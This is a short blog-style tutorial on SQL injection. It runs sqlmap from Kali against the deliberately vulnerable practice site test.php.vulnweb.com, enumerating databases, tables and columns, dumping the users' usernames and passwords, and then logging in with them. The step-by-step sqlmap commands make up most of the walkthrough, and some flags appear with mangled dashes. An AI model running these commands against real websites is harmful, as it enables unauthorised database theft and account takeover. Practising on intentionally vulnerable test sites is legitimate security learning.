Database Hacking : Sql Injection

0

SQL injection is a very common technique for hacking web applications, SQL injection can easily destroy the database of the website.

SQL injection is the placement of malicious code in SQL statements, via web page input.

so today, we are going to do a SQL injection on a website with the help of a very powerful tool called SQL map.

Fire Up Kali :

Firstly, select the target website.

My Target: https://test.php.vulnweb.com/artist.php?artist=1

Open Terminal :

$ sqlmap -h

Now, we will use SQLmap to inject code and attack the website database to fetch all the credentials from the database.

$ sqlmap -u “https://test.php.vulnweb.com/artist.php?artist=1” –dbs

It helps to find the database, i.e MySQL, or any other, which the website is using!

It will scan the whole website.

 

 

As you can see here we get the 2 databases.

ok, so now we will go into the database, we’ll go into acuart.

 

$ sqlmap -u https://test.php.vulnweb.com/artist.php?artist=1 -D acuart –tables

so, we will find the no. of tables in the database.

After this, we need to find the columns of the database, we will find the column of the users.

 

$ sqlmap -u “https://test.php.vulnweb.com/artist.php?artist=1” -D acuart -T users –columnsĀ 

now, it will fetch the columns of the tables of users.

Ok we get the table where we will fetch the data of users .

so finally we will fetch the username of the user.

$ sqlmap -u “https://test.php.vulnweb.com/artist.php?artist=1” -D acuart -T users -C uname –dump

so, here we get the username of the users!!!!

Same as we’ll go with the password.

$ sqlmap -u “https://test.php.vulnweb.com/artist.php?artist=1” -D acuart -T users -C pass –dump

here, it will dump the password of the user!!!

now , we get the username and the password of the user!! so open the website login portal!!

here, we’ll login with the credentials that we have got from sql injection.

so finally we logged in with that credentials !!!

 

Thank you !!!

LEAVE A REPLY

Please enter your comment!
Please enter your name here